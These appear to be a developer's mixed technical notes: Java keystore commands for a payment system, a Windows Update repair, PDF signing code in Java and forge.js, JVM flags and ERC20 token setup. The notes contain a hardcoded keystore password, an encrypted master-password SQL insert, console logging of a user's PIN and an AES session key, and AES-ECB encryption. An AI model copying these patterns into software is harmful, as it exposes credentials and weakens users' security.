INSERT INTO PASSWORD_STORE(PASSWORD_STORE_ID, USER_ID, USAGE_TYPE, PASSWORD, SIGNATURE, LAST_UPDATE_DT) VALUES ('0', 'MASTER_PASSWORD', 'INTERNAL', 'xzn+q7+DcT/Z2eTHVDDO9WRia4R/CHP23cU2bA9Eatgh6xA6Ah5qaK6CTf93ILT+C8ezhDMAe0/IdU916ExB8+iXozYKNnBp5/g4YpvzGYDcsYM6GnH5KA3YZY6EchRjXw1P576m5jQdMY6bQmcdEg7bB1JwufkISneQV1SnpuKev9G4O2oTHamyvaGuAxtj1lWm5we4AmBgGD6hF75ZAdu/IKL2n5h1BflT61jcSCrTYW0yCkWR0JFoN+x7eM3WGBZcw/BDWpIAfxVR6O0hJTkw6S6SDM6kheusfpzc36wcBrxP2yG/Jp+TZVWpSKDxCkLaM+i68K8wonEkQO0nBQ==', 'DeKWX8F/81JGQWeKowS5KsWNu2Poid7w+nDyC3IFRkdjNxAO+yqgKt9GX6QjAa3C61PtbMvPKxzfRjqZZeCx5aUbN+S4FCjKW8b4y8EZxI1TOSc31W6Je2McBxSRqqNPbB382W4lP+K7BXFIC0MS5PGtx+ES28k+rfLJcoRHzlhHKgkXUSIknPfWzLOzGJsg3DFynDXMoH3Jc7lZ2QRWZ2lmfqHm1rPGBfpg6W3YFzFDxJaA/U36A4xrGsYBja3v7+QLQFH7CtvF7XBWAN3HZpBylY8z/5MhMvwo+sj0dVc7z7Q2RLTd1ID0E2C6jI1CKLfLc2SKnho8phzT8xX8rg==', now());

Add support for HKPOST_TRIAL cert for testing in webserver.properties

Payment and Payment Reconciliation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
generate privateKeyEntry (friendly3)
openssl pkcs12 -export -inkey my.hksarg-privateKey.key -in sit.xxx.cr.hksarg.crt -name friendly3 -out friendly3.p12
keytool -importkeystore -srckeystore friendly3.p12 -srcstoretype pkcs12 -alias friendly3 -destkeystore xxx_egis.jks

UAT renew:
keytool -v -list -keystore xxx_egis.jks -alias friendly3 -storepass yyy.xxx@2017
keytool -delete -keystore xxx_egis.jks -alias friendly3 -storepass yyy.xxx@2017
openssl pkcs12 -export -inkey my.hksarg-privateKey.key -in uat.my.cr.hksarg.crt -name friendly3 -out friendly3.p12
keytool -importkeystore -srckeystore friendly3.p12 -srcstoretype pkcs12 -alias friendly3 -destkeystore xxx_egis.jks

Generate trustedCertEntry (epayment_signing)
keytool -genkey -keystore payment_signing.jks -keyalg RSA -keysize 2048 -validity 3650 -storepass yyy.xxx@2017
keytool -import -v -alias payment_signing -file UAT_2016_epayment_signing-b64.cer -keystore xxx_egis.jks -storepass yyy.xxx@2017

Generate trustedCertEntry (trust1)
#keytool -genkey -keystore xxx_egis.jks -keyalg RSA -keysize 2048 -validity 3650 -storepass yyy.xxx@2017
keytool -import -trustcacerts -v -alias trust1 -file iscca256.cer -keystore xxx_egis.jks -storepass yyy.xxx@2017
keytool -import -trustcacerts -v -alias rootca -file rootca256.cer -keystore xxx_egis.jks -storepass yyy.xxx@2017
#keytool -delete -alias mykey -keystore trust_store3.jks -storepass yyy.xxx@2017 // as xxx_egis is created and mykey does not exist

Add below item as below in KMU
* key entry : friendly3
* cert entry : payment_signing
* cert entry : trust1
Add passphase boci-key and ppsb-key with usage=paymentRecon

Keystore

1
2
D:\keystore\xxx_master.jks comes from rm2\keys\sit\xxx_master.jks
D:\keystore\xxx_egis.jks comes from rm2\keys\sit\xxx_egis.jks

Install unlimited strength JCE policy files named local_policy.jar and US_export_policy.jar at \lib\security

paymentclient_web -> IApp1/2, paymentrecon-portal_web, paymentrecon-dept_web -> GApp1/2

  1. JOB_RM_PAY_BACKGROUND_RECOVERY
  2. JOB_RM_PAYRECON_PAYMENT_RECON_01_PPSB
  3. JOB_RM_PAYRECON_PAYMENT_RECON_02_BOCI
  4. JOB_RM_PAYRECON_PSDR_EXPORTER
  5. JOB_RM_PAYRECON_PSDR_IMPORTER
    1
    2
    3
    4
    <jms-queue name="BackgroundRecoveryQueue" entries="queue/BackgroundRecoveryQueue"/>
    <jms-queue name="PSDRExporterScheduleJobQueue" entries="queue/PSDRExporterScheduleJobQueue"/>
    <jms-queue name="PSDRImporterScheduleJobQueue" entries="queue/PSDRImporterScheduleJobQueue"/>
    <jms-queue name="PaymentReconScheduleJobQueue" entries="queue/PaymentReconScheduleJobQueue"/>

Fix Problem in Windows Update

Encounter error code 0x800f0831, that means missing some security patch before installing current windows update.

check log file CBS.log in path C:\Windows\Logs\CBS, it is found there is missing package shown as below

1
2
3
4
5
6
2019-05-07 10:30:15, Info                  CBS    Store corruption, manifest missing for package: Package_1095_for_KB4093121~31bf3856ad364e35~amd64~~6.3.1.6
2019-05-07 10:30:15, Error CBS Failed to resolve package 'Package_1095_for_KB4093121~31bf3856ad364e35~amd64~~6.3.1.6' [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info CBS Mark store corruption flag because of package: Package_1095_for_KB4093121~31bf3856ad364e35~amd64~~6.3.1.6. [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info CBS Failed to resolve package [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info CBS Failed to get next package to re-evaluate [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]
2019-05-07 10:30:15, Info CBS Failed to process component watch list. [HRESULT = 0x800f0831 - CBS_E_STORE_CORRUPTION]

Then download the file KB4093121 from Windows Updates category website, and run following commands to re-install the security update

1
2
3
4
copy c:\Users\Administrator\Downloads\windows8.1-kb4093121-x64_4e8483bcb4ad56a5b63959af8c3fc0dba9f93d48.msu c:\Windows\Temp
cd c:\Windows\Temp
expand windows8.1-kb4093121-x64_4e8483bcb4ad56a5b63959af8c3fc0dba9f93d48.msu -f:* .
DISM.exe /Online /Add-Package /PackagePath:Windows8.1-kb4093121-x64.cab

Also we can check log file at c:\Windows\Logs\DISM\dism.log

To repairing system and servicing health by running

1
2
3
--> sfc /scannow
--> dism.exe /online /cleanup-image /scanhealth
--> dism.exe /online /cleanup-image /restorehealth

Reference

Fix 0x800F0831,CBS_E_STORE_CORRUPTION, this is the solution
List installed windows updates, by powershell or command
https://www.sysnative.com/forums/threads/server2012r2-datacenter-code-800f0831-kb2973351.23888/
Windows updates failed to install with error code : 800F0831 in Windows Server 2012 R2
Windows Update Catalog, download KB from here

PDF Signing By p12 With JS

DocSignController.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
@GetMapping("/doc-sign/sign")
public ResponseEntity<Resource> getHashForSign() throws IOException {
log.debug("start to generate merged PDF in java web start program");
synchronized (eventPublisher) {
eventPublisher.publishEvent(new OnDocMergeEvent(getUserId(), getXxxFormMaster().getXxxFormMasterId(), getXxxFormMaster().getFormType()));
}
Integer xxxFormMasterId = getXxxFormMaster().getXxxFormMasterId();
String userId = getUserId();

List<SuppDoc> suppDocs = suppDocMapper.selectSuppDocByXxxFormMasterIdAndDocTypeAndUserId(xxxFormMasterId, userId, Constants.SUPP_DOC_TYPE_SYS_GEN_MERGE);
if (suppDocs == null || suppDocs.isEmpty()) {
suppDocs = suppDocMapper.selectSuppDocByXxxFormMasterIdAndDocTypeAndUserId(xxxFormMasterId, userId, Constants.SUPP_DOC_TYPE_SYS_SIGN);
if (suppDocs != null && !suppDocs.isEmpty()) {
log.info("signed doc exists !!");
return ResponseEntity.status(HttpStatus.NOT_ACCEPTABLE).body(null);
}
return ResponseEntity.status(HttpStatus.NOT_FOUND).body(null);
}

SuppDoc suppDoc = suppDocs.get(0);
Integer suppDocId = suppDoc.getSuppDocId();

Resource pdfFile = storageService.loadAsResource(xxxFormMasterId, suppDocId);

File tempPdfFile = File.createTempFile("tmp", ".pdf");
log.debug("Prepare pdf file for sign: {}", tempPdfFile.getPath());

log.info("get hash for sign, userId {} form master id {}", userId, xxxFormMasterId);

InputStream is = null;
try {
is = emptySignature(pdfFile.getInputStream(), tempPdfFile);
} catch (DocumentException | GeneralSecurityException e) {
log.error("error occurrs on calculate signature", e);
}

byte[] encryptedEmptySig = encrypt(StreamUtils.copyToByteArray(is));
//byte[] emptySig = StreamUtils.copyToByteArray(is);
String emptySig = Base64.getEncoder().encodeToString(encryptedEmptySig);

ByteArrayResource resource = new ByteArrayResource(emptySig.getBytes(StandardCharsets.ISO_8859_1));

HttpHeaders headers = new HttpHeaders();
headers.add("Cache-Control", "no-cache, no-store, must-revalidate");
headers.add("Pragma", "no-cache");
headers.add("Expires", "0");

request.getSession(false).setAttribute(TEMP_SIGN_PATH, tempPdfFile.getPath());

return ResponseEntity.ok()
.headers(headers)
.contentLength(resource.contentLength())
.contentType(MediaType.TEXT_PLAIN)
.body(resource);
}

private byte[] encrypt(byte[] emptySig) {
/*try {
log.debug("js debugging for signing with forge")
log.debug("HexBin.encode(emptySig) " + HexBin.encode(emptySig).substring(0, 500));
MessageDigest messageDigest = MessageDigest.getInstance("SHA-256");
byte hash[] = messageDigest.digest(emptySig);
System.out.println("server emptySig sha256 hash = " + Hex.toHexString(hash));
} catch (NoSuchAlgorithmException e1) {
}*/

String type = "X.509";

String encodedCertificate = request.getParameter("certificate");
try {
CertificateFactory certificateFactory = CertificateFactory.getInstance(type);
Certificate certificate = certificateFactory.generateCertificate(
new ByteArrayInputStream(HashUtils.base64Decode(encodedCertificate)));
PublicKey publicKey = certificate.getPublicKey();

Cipher rsaCipher;
try {
rsaCipher = Cipher.getInstance(RSA_ALGORITHM);
rsaCipher.init(Cipher.ENCRYPT_MODE, publicKey);

// reference from https://stackoverflow.com/questions/24338108/java-encrypt-string-with-existing-public-key-file
// Now create a new 256 bit Rijndael key to encrypt the file itself.
// This will be the session key.
/*KeyGenerator rijndaelKeyGenerator = KeyGenerator.getInstance("Rijndael");
rijndaelKeyGenerator.init(256);
log.debug("Generating session key...");
Key rijndaelKey = rijndaelKeyGenerator.generateKey();
log.debug("Done generating key.");

byte[] encodedKeyBytes = rsaCipher.doFinal(rijndaelKey.getEncoded());
ByteArrayOutputStream output = new ByteArrayOutputStream();
output.write(encodedKeyBytes.length);
output.write(encodedKeyBytes);

// Now we need an Initialization Vector for the symmetric cipher in CBC mode
SecureRandom random = new SecureRandom();
byte[] iv = new byte[16];
random.nextBytes(iv);

output.write(iv);

IvParameterSpec spec = new IvParameterSpec(iv);
// Create the cipher for encrypting the file itself.
Cipher symmetricCipher = Cipher.getInstance(RIJNDAEL_ALGORITHM);
symmetricCipher.init(Cipher.ENCRYPT_MODE, rijndaelKey, spec);
*/

ByteArrayOutputStream baos = new ByteArrayOutputStream();
DataOutputStream output = new DataOutputStream(baos);

KeyGenerator generator = KeyGenerator.getInstance("AES");
generator.init(128);
log.debug("Generating session key...");
SecretKey aesKey = generator.generateKey();
log.debug("Done generating key.");

log.debug("aesKey.getEncoded() = " + Base64.getEncoder().encodeToString(aesKey.getEncoded()));
byte[] encodedKeyBytes = rsaCipher.doFinal(aesKey.getEncoded());

// output = encrypted AES key length + encrypted AES key + empty signature encrypted by AES key
log.debug("encrypted AES key length = " + encodedKeyBytes.length);
output.writeInt(encodedKeyBytes.length);
output.write(encodedKeyBytes);

Cipher symmetricCipher = Cipher.getInstance(AES_ALGORITHM);
symmetricCipher.init(Cipher.ENCRYPT_MODE, aesKey);

output.write(symmetricCipher.doFinal(emptySig));
output.flush();

log.debug("length of encrypted data = " + baos.toByteArray().length);
return baos.toByteArray();
} catch (NoSuchAlgorithmException | NoSuchPaddingException | InvalidKeyException
| IllegalBlockSizeException | BadPaddingException | IOException e) {
log.error("encrypt empty signature", e);
}
} catch (CertificateException e) {
log.error("encrypt", e);
}

return null;
}

private InputStream emptySignature(InputStream src, File dest)
throws IOException, DocumentException, GeneralSecurityException {
PdfReader reader = new PdfReader(src);
FileOutputStream os = new FileOutputStream(dest);
PdfStamper stamper = PdfStamper.createSignature(reader, os, '\0');
PdfSignatureAppearance appearance = stamper.getSignatureAppearance();

//appearance.setVisibleSignature(new Rectangle(0, 0, 0, 0), 1, FIELD_NAME);
log.info("create empty signature");
String position = (String) WebUtils.getSession().getAttribute(WebAttributeNames.SESSION_PSCT_DOC_SIGNATURE_POSITION);
String[] p = position.split("\\|");
appearance.setVisibleSignature(new Rectangle(Float.valueOf(p[0]), Float.valueOf(p[1]), Float.valueOf(p[2]), Float.valueOf(p[3])), Integer.valueOf(p[4]), Constants.SIG_FIELD_NAME);

// set signature text
Font font = new Font(FontFamily.TIMES_ROMAN, 10, Font.BOLD);
appearance.setLayer2Font(font);
appearance.setRunDirection(PdfWriter.RUN_DIRECTION_RTL);

appearance.setLayer2Text("Signed By Digital Certificate");

ClassPathResource pinImage = new ClassPathResource("static/images/Cert-sign.png");
appearance.setImage(Image.getInstance(pinImage.getURL()));

//appearance.setCertificate(chain[0]);
ExternalSignatureContainer external = new ExternalBlankSignatureContainer(PdfName.ADOBE_PPKLITE,
PdfName.ADBE_PKCS7_DETACHED);
MakeSignature.signExternalContainer(appearance, external, 8192);
os.close();
return appearance.getRangeStream();
}

@PostMapping(value = "/doc-sign/sign", produces = MediaType.APPLICATION_JSON_VALUE)
@ResponseBody
public CertSignResult attachSignedHash() {
CertSignResult certSignResult = new CertSignResult();
certSignResult.setStatus(CertSignResult.STATUS_NOT_SIGNED);

try {
if (!WebUtils.validateCert(pkiClient)) {
return certSignResult;
}
} catch (Exception e) {
log.error("signHash", e);
return certSignResult;
}

String tempPath = (String) request.getSession(false).getAttribute(TEMP_SIGN_PATH);

Integer xxxFormMasterId = getXxxFormMaster().getXxxFormMasterId();
String userId = getUserId();

log.info("sign hash, userId {} form master id {}", userId, xxxFormMasterId);

// tryToDeleteSignedDoc();

File tempSignedFile = null;

try {
tempSignedFile = File.createTempFile("signed-" + xxxFormMasterId + "-", ".pdf");

String hash = request.getParameter("signed");
//log.debug("hash {}", hash);
// Save the hash to file pkcs7-hash.pem
// View p7 file content by: openssl asn1parse -inform pem -in pkcs7-hash.pem

byte[] signedhash = Base64.getDecoder().decode(hash);

createSignature(tempPath, tempSignedFile, signedhash);
} catch (DocumentException | GeneralSecurityException | IOException e) {
log.error("Fail to sign document " + e);
return certSignResult;
}

SimpleSuppDoc doc = new SimpleSuppDoc();
doc.setXxxFormMasterId(xxxFormMasterId);
doc.setLocalFile(tempSignedFile);
doc.setSuppDocType(Constants.SUPP_DOC_TYPE_SYS_SIGN);

try {
Integer suppDocId = storageService.store(doc, userId);

if (doc.isUploadSucess()) {
insertSigningLog(userId, xxxFormMasterId, suppDocId);

// no need to keep the merged doc
storageService.deleteDocByUserIdAndType(xxxFormMasterId, userId, Constants.SUPP_DOC_TYPE_SYS_GEN_MERGE);

certSignResult.setStatus(CertSignResult.STATUS_SIGNED);
request.getSession(false).setAttribute(WebAttributeNames.SESSION_PSCT_DOC_SIGN_STATUS, certSignResult);

createZipFileForSignedDoc(userId, tempSignedFile);
return certSignResult;
}
} catch (IOException e) {
log.error("sign pdf file", e);
} finally {
if (tempSignedFile != null)
tempSignedFile.delete();
}

return certSignResult;
}

private void createSignature(String src, File dest, byte[] signedHash)
throws IOException, DocumentException, GeneralSecurityException {
PdfReader reader = new PdfReader(src);
FileOutputStream os = new FileOutputStream(dest);
ExternalSignatureContainer external = new MyExternalSignatureContainer(signedHash);
MakeSignature.signDeferred(reader, Constants.SIG_FIELD_NAME, os, external);
os.close();
}

class MyExternalSignatureContainer implements ExternalSignatureContainer {
protected byte[] sig;

public MyExternalSignatureContainer(byte[] sig) {
this.sig = sig;
}

@Override
public void modifySigningDictionary(PdfDictionary signDic) {
}

@Override
public byte[] sign(InputStream arg0) throws GeneralSecurityException {
return sig;
}
}

JS for PDF signing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
function signAndSubmit() {
console.log("signAndSubmit")

var idType = $(":radio[name='idType']:checked").val();
var hkid = $("#hkid").val();
var hkidCheckDigit = $("#hkidCheckDigit").val();
var passport = $("#passport").val()
var file = document.getElementById("filename").files[0];

if (!checkInput(idType, hkid, hkidCheckDigit, passport, file))
return false;

var password = $("#pin").val();
console.log("password " + password)

//Reading certificate from a 'file' form field
var reader = new FileReader();
reader.onload = function (e) {
var contents = e.target.result;

var pkcs12 = loadFile(password, contents);
if(!pkcs12){
showError(ErrorCode.INVALID_PIN);
return false;
}

extractInfo(pkcs12, idType, hkid, hkidCheckDigit, passport).then(function (info) {
var data = {
signature: info.signature,
// certLogin: "1",
certificate: info.certificate,
hkid: hkid + ":" + hkidCheckDigit,
passport: passport,
idType: idType,
};

$.ajax({
type: 'GET',
url: resetStatusUrl + "?keep-challenge=1",
dataType: 'json',
async: false,
success: function(result) {
if (result == 0) {
console.log("start to do signing for the PDF");
}
},
error: function(exception) {
window.location.href = errPath;
}
});

$.get(validateUserUrl, { hkid: data.hkid, passport: data.passport, idType: data.idType }).done(function (result) {
if (result == 'T') {
$.get(signAndSubmitUrl, { certificate: data.certificate }).done(function (signature) {
console.log("signature = " + signature.length);
var ciphertext = forge.util.decode64(signature);

var buffer = forge.util.createBuffer(ciphertext, 'binary');

var aesKeyLength = buffer.getInt32();
console.log("aesKeyLength = " + aesKeyLength);

var encryptedAesKey = buffer.getBytes(aesKeyLength);
console.dir(encryptedAesKey);

var aesKey = privateKey.decrypt(encryptedAesKey);
console.log("decrypted aesKey = " + forge.util.encode64(aesKey));

var decipher = forge.cipher.createDecipher('AES-ECB', aesKey);
decipher.start();
decipher.update(forge.util.createBuffer(buffer.getBytes()));

var result = decipher.finish(); // check 'result' for true/false
console.log("result = " + result);
// outputs decrypted hex
// console.log("outputs decrypted hex = " + decipher.output.toHex());

var emptySig = decipher.output.getBytes();

/* debug for signing
var md = forge.md.sha256.create();
var sh = md.update(decipher.output.getBytes()).digest().toHex();
console.log("origEmptySig sha256 hash = " + sh);
var sh = privateKey.sign(md.update(decipher.output.getBytes()))
*/

var p7 = forge.pkcs7.createSignedData();
p7.content = "Arbitrary data"; // privateKey.sign(md.update(decipher.output.getBytes()));

let _cert; // individual's e-cert
if (info.ca.indexOf('HKPOST') != -1) {
_cert = certChain[0];
certChain.reverse();
} else {
_cert = certChain.slice(-1)[0]
}

// e-cert order: root cert, intermediate cert, individual cert
for (var i = 0; i <= certChain.length - 1; i++) {
p7.addCertificate(certChain[i]);
}

p7.addSigner({
key: privateKey,
certificate: _cert,
digestAlgorithm: forge.pki.oids.sha256,
authenticatedAttributes: [{
type: forge.pki.oids.contentType,
value: forge.pki.oids.data
}, {
type: forge.pki.oids.messageDigest,
value: emptySig // custom digest
}, {
type: forge.pki.oids.signingTime,
value: new Date()
}]
});


p7.sign({ detached: true });

//var out = forge.asn1.toDer(p7.toAsn1()).getBytes();
var out = forge.pkcs7.messageToPem(p7)
// console.log(out);
//var signedHash = forge.util.encode64(out);
signedHash = out.replace("-----BEGIN PKCS7-----", "").replace("-----END PKCS7-----", "").split("\r\n").join("");
//console.dir(signedHash);

data.signed = signedHash;
// console.dir(data);

$.post(signAndSubmitUrl, data, function (result) {
//alert("sign result " + result.status);
if (result.status == "F") {
showError(-131);
} else {
showMessage("doc.sign.success");
}
});
}).fail(function(xhr, statusText, error){
//alert("error status code " + xhr.status);
if (xhr.status == 406) {
showError(-134);
} else if (xhr.status == 404) {
showError(-133);
}
});
} else {
showError(-138);
}
});
}).catch(function (info) {
console.log("error code : " + info.errCode);
showError(info.errCode);
});
}

reader.readAsArrayBuffer(file);
return false;
}

following code writtern was studied by the result from openssl asn1parse -inform pem -in pkcs7-hash.pem

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
for (var i = 0; i <= certChain.length - 1; i++) {
p7.addCertificate(certChain[i]);
}

p7.addSigner({
key: privateKey,
certificate: _cert,
digestAlgorithm: forge.pki.oids.sha256,
authenticatedAttributes: [{
type: forge.pki.oids.contentType,
value: forge.pki.oids.data
}, {
type: forge.pki.oids.messageDigest,
value: emptySig // custom digest
}, {
type: forge.pki.oids.signingTime,
value: new Date()
}]
});


p7.sign({ detached: true });

forge.js was hacked by adding following code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
for(var ai = 0; ai < signer.authenticatedAttributes.length; ++ai) {
var attr = signer.authenticatedAttributes[ai];
if(attr.type === forge.pki.oids.messageDigest) {
// use content message digest as value
// attr.value = mds[signer.digestAlgorithm].digest();

// ++++++++ change for setting a custom digest for PDF signing
var digest = mds[signer.digestAlgorithm].start().update(attr.value).digest();
attr.value = digest;
// ++++++++

} else if(attr.type === forge.pki.oids.signingTime) {
// auto-populate signing time if not already set
if(!attr.value) {
attr.value = signingTime;
}
}

AuthenticationApplet.java (itext for PDF signing), below code is as the reference for study on PDF signing with js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
public String signDoc(String emptySig, String keyID, String type, String privateKeyPassword) {
if (privateKeyPassword == null || "".equals(privateKeyPassword.trim())) {
privateKeyPassword = m_password;
}

if ("p12".equals(type)) {
m_providerName = "BC";
}

PrivateKey privateKey = null;
try {
privateKey = (PrivateKey) m_keyStore.getKey(keyID, privateKeyPassword.toCharArray());
} catch (UnrecoverableKeyException | KeyStoreException | NoSuchAlgorithmException e1) {
e1.printStackTrace();
}

String signHashStr = "";

try {
//byte[] origEmptySig = Base64.getUrlDecoder().decode(emptySig);
byte[] origEmptySig = decrypt(Base64.getDecoder().decode(emptySig), privateKey);
// System.out.println("Showing information for debugging PDF signing using javascript
// System.out.println("origEmptySig = " + Hex.toHexString(origEmptySig).substring(0, 300));

ByteArrayInputStream emptySignature = new ByteArrayInputStream(origEmptySig);

Security.addProvider(new BouncyCastleProvider());

PrivateKeySignature signature = new PrivateKeySignature(privateKey, "SHA256", m_providerName);
String hashAlgorithm = signature.getHashAlgorithm();

System.out.println("hashAlgorithm = " + hashAlgorithm);
BouncyCastleDigest digest = new BouncyCastleDigest();
Certificate[] certificateChain = retrieveCertificateChain(keyID);

/*String oid = DigestAlgorithms.getAllowedDigests(hashAlgorithm);
System.out.println("oid = " + oid);*/

MessageDigest messageDigest = digest.getMessageDigest(hashAlgorithm);
byte hash[] = DigestAlgorithms.digest(emptySignature, messageDigest);

//MessageDigest messageDigest = MessageDigest.getInstance("SHA-256");
//byte hash[] = messageDigest.digest(origEmptySig);

// System.out.println("origEmptySig sha256 hash = " + Hex.toHexString(hash));

PdfPKCS7 sgn = new PdfPKCS7(null, certificateChain, hashAlgorithm, null, digest, false);
Calendar cal = Calendar.getInstance();
byte[] sh = sgn.getAuthenticatedAttributeBytes(hash, cal, null, null, CryptoStandard.CMS);
//System.out.println("AuthenticatedAttributeBytes sha256 hash = " + Hex.toHexString(sh));

byte[] extSignature = signature.sign(sh);
//System.out.println("signed AuthenticatedAttributeBytes = " + Hex.toHexString(hash));

sgn.setExternalDigest(extSignature, null, signature.getEncryptionAlgorithm());
byte[] signHash = sgn.getEncodedPKCS7(hash, cal, null, null, null, CryptoStandard.CMS);

// System.out.println("signHash = " + Hex.toHexString(signHash).substring(0, 300));

signHashStr = Base64.getEncoder().encodeToString(signHash);
//Files.write(Paths.get("D:/pkcs7-hash.p7b"), signHash, StandardOpenOption.CREATE);

//System.out.println("signHash = " + signHashStr);
} catch (Exception e) {
System.err.println("An unknown error on calculating hash for signature: " + e.getMessage());
e.printStackTrace();
}

return signHashStr;
}

private static final String RSA_ALGORITHM = "RSA/ECB/PKCS1Padding";
private static final String AES_ALGORITHM = "AES/ECB/PKCS5Padding";

private byte[] decrypt(byte[] ciphertext, PrivateKey privateKey) throws IOException {
try {
Cipher rsaCipher = Cipher.getInstance(RSA_ALGORITHM);
rsaCipher.init(Cipher.DECRYPT_MODE, privateKey);

DataInputStream dis = new DataInputStream(new ByteArrayInputStream(ciphertext));

byte[] encryptedKeyBytes = new byte[dis.readInt()];

dis.readFully(encryptedKeyBytes);

byte[] aesKeyBytes = rsaCipher.doFinal(encryptedKeyBytes);

SecretKeySpec key = new SecretKeySpec(aesKeyBytes, "AES");
Cipher cipher = Cipher.getInstance(AES_ALGORITHM);
cipher.init(Cipher.DECRYPT_MODE, key);

ByteArrayOutputStream output = new ByteArrayOutputStream();
int len = -1;
byte[] buffer = new byte[4096];

while ((len = dis.read(buffer, 0, buffer.length)) != -1) {
output.write(buffer, 0, len);
}

output.flush();

return cipher.doFinal(output.toByteArray());
} catch (Exception e) {
System.err.println("An unknown error on decrypt key: " + e.getMessage());
}

return null;
}

Reference

https://security.stackexchange.com/questions/73156/whats-the-difference-between-x-509-and-pkcs7-certificate
https://security.stackexchange.com/questions/41399/openssl-pkcs7-vs-s-mime
https://crypto.stackexchange.com/questions/37084/is-pkcs7-a-signature-format-or-a-certificate-format

openssl asn1parse -inform pem -in pkcs7-hash.pem
Manual verify PKCS#7 signed data with OpenSSL

JVM Study

List all VM flags

java -XX:+UnlockDiagnosticVMOptions -XX:+PrintFlagsFinal -version

JAVA_OPTS settings for OpenJDK 11

File: d:\App\wildfly-10.1.0.Final\bin\standalone.conf.bat

1
2
set "JAVA_OPTS=%JAVA_OPTS% -Dhk.gov.ogcio.egis.rm.common.PROPERTIES_FILEPATH=D:\rm -Djboss.bind.address=0.0.0.0 -Dspring.profiles.active=uat -Djavax.net.ssl.trustStore=D:\keystore\psct_egis.jks -Dfreetts.voices=de.dfki.lt.freetts.en.us.MbrolaVoiceDirectory -Dmbrola.base=D:\mbrola"
set "JAVA_OPTS=%JAVA_OPTS% -XX:MaxGCPauseMillis=500 -XX:ErrorFile=D:/log/hserrpid%p.log -XX:HeapDumpPath=D:/log/ -Xloggc:D:/log/gc.log -XX:+PrintGCDetails -XX:+HeapDumpOnOutOfMemoryError"

Profiling commands

1
2
3
4
jinfo <pid>

jmap -dump:live,format=b,file=heap.bin <pid>
jstack <pid>

Reference

http://stas-blogspot.blogspot.com/2011/07/most-complete-list-of-xx-options-for.html
https://www.oracle.com/technetwork/java/javase/tech/vmoptions-jsp-140102.html#Options
https://stackoverflow.com/questions/43087831/complete-list-of-jvm-options
https://my.oschina.net/u/3627055/blog/2995973

ERC20 TOKEN DEVELOP

Environment setup

Open C:\MinGW\msys\1.0\msys.bat

1
2
3
4
5
yarn global add truffle
yarn global add ganache-cli

# download web3j and configue path
export PATH=$PATH:/C/Users/me/AppData/Local/Yarn/Data/global/node_modules/.bin:/C/Users/me/Downloads/web3j-3.5.0/bin`

Start enthereum client (or you can install geth-windows-386-1.8.13-225171a4.exe)

ganache-cli

Compile and deploy contract

Open another command prompt
Reference https://www.codeooze.com/blockchain/ethereum-truffle-hello-world/ to initialize a project

1
2
3
4
5
6
7
8
9
10
cd /d 
mkdir enthereumn-test && cd enthereumn-test
truffle init
truffle console
> web3.eth.accounts

truffle unbox tutorialtoken # init command no need to call
truffle create contract TutorialToken # write your own contract

yarn add openzeppelin-solidity

Add following code to tutorialtoken.sol

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
pragma solidity ^0.4.22;

import "openzeppelin-solidity/contracts/token/ERC20/StandardToken.sol";

contract TutorialToken is StandardToken {
string public name = "TutorialToken";
string public symbol = "TT";
uint8 public decimals = 2;
uint public INITIAL_SUPPLY = 12000;

constructor() public{
totalSupply_ = INITIAL_SUPPLY;
balances[msg.sender] = INITIAL_SUPPLY;
}
}

Compile and migrate solidity code

1
2
truffle compile # compile contracts\*.sol => build\contracts\*.json
truffle migrate # deploy contracts to ganache private network

Compile contract to java code

web3j.bat truffle generate --javaTypes D:\entherumn_env\tutorial-coin\build\contracts\TutorialToken.json -o .\java -p tutorialtoken
web3j.bat truffle generate --javaTypes D:\entherumn_env\tutorial-coin\build\contracts\SampleCrowdsaleToken.json -o .\java -p tutorialtoken
